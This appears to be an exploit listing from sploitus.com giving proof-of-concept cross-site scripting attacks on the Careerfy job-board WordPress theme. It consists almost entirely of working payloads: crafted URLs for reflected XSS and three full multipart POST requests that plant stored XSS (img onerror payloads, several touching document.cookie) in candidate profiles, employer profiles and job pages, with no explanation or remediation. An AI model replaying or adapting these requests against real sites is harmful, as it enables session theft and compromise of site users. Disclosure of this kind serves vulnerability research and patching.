Share
## https://sploitus.com/exploit?id=WPEX-ID:10291
### [ PoC Unauthenticated Reflected XSS: ]

https://careerfy.net/petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`XSS`);%20%22%3E&loc_radius=50

https://careerfy.net/careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60XSS%60%29%3E&sector_cat=&job_type=part-time

https://careerfy.net/careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`);%3E



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------122256774439635172062989578806
Content-Length: 5335
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"

01-07-2020
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_phone"

OK
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="dial_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_sector"

41
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

XSS
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_bio"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="academic-level"

masters-degree"><img src=x onerror=alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="Age"

18-22-years"><img src=x onerror=alert(document.domain);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="salary"

1337"><img src=x onerror=alert(`XSS`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="gender"

hacker"><img src=x onerror=alert(`YAY!`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="industry"

web-security"><img src=x onerror=alert(`XSS`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_twitter_url"

https://twitter.com/vlad_vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`XSS`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lat"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lng"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------122256774439635172062989578806--



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------207058957013654520581670329262
Content-Length: 5853
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_phone"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="dial_code"

1"--><!--<img src="-->"><img src=x onerror=alert(`XSS`);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="contry_iso_code"

ru
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_website"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_sector"

33
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_bio"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="founded-since"

2018
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_address"

OK"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: image/jpeg


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

1337"><img src=x onerror=alert(document.domain);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------207058957013654520581670329262--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------5410881451781327061235735546
Content-Length: 4680
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update
Cookie: [cookies_here]

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="application_deadline"

July 2, 2020 2:48 pm"><img src=x onerror=alert(document.cookie);>
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_sector"

33
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_type"

21
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="get_job_skills[]"

Developer"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_type"

internal"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_url"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_email"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_max_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="offered-salary"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="career-level"

officer"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="experience"

less-than-1-year"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="gender"

male"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="Industry"

development"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="qualifications"

certificate"><img src=x onerror=alert(document.domain); >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`XSS`); >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lat"

55.761035
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lng"

37.536004
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

9.719789233510344
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------5410881451781327061235735546--